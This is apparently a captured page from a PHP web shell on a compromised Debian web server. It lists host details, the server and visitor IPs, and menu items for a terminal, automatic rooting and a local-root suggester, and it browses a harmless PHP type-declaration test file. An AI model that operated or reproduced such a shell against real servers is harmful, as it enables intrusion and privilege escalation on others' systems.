Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
Zend /
tests /
object_types /
Delete
Unzip
Name
Size
Permission
Date
Action
invalid_default_value.phpt
210
B
-rw-rw-r--
2022-10-31 11:36
missing_return_type_inheritance_in_class.phpt
296
B
-rw-rw-r--
2022-10-31 11:36
missing_return_type_inheritance_in_interface.phpt
305
B
-rw-rw-r--
2022-10-31 11:36
return_type_in_class.phpt
501
B
-rw-rw-r--
2022-10-31 11:36
return_type_in_function.phpt
275
B
-rw-rw-r--
2022-10-31 11:36
return_type_inheritance_in_class.phpt
517
B
-rw-rw-r--
2022-10-31 11:36
return_type_inheritance_in_interface.phpt
528
B
-rw-rw-r--
2022-10-31 11:36
return_type_reflection.phpt
730
B
-rw-rw-r--
2022-10-31 11:36
type_hint_in_class_method.phpt
359
B
-rw-rw-r--
2022-10-31 11:36
type_hint_in_function.phpt
331
B
-rw-rw-r--
2022-10-31 11:36
type_hint_reflection.phpt
758
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Object type can only default to null --FILE-- <?php function test(object $obj = 42) { } ?> --EXPECTF-- Fatal error: Default value for parameters with an object type can only be NULL in %s on line %d